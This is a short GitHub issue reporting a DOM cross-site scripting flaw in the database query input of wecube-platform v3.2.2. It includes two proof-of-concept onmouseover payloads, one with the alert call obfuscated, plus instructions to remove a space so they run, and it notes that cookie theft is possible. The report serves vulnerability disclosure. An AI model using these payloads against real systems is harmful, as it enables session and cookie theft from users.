wecube-platform icon indicating copy to clipboard operation
wecube-platform copied to clipboard
verified publisher icon WeBankPartners

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Open 0x30Rizk opened this issue 3 years ago • 0 comments

描述您遇到的bug
DOM XSS存在資料庫查詢語句中,wecube v3.2.2

如何重现 ` 輸入 select < b onmouseover="window['ale'+'rt']('DOM XSS')">hello

select < b onmouseover='alert("XSS")'>hello ` Notes:請刪除< 空格 预期行为 javascript允許執行,可以竊取cookie

截图
01 02

附加

0x30Rizk avatar Aug 05 '22 12:08 0x30Rizk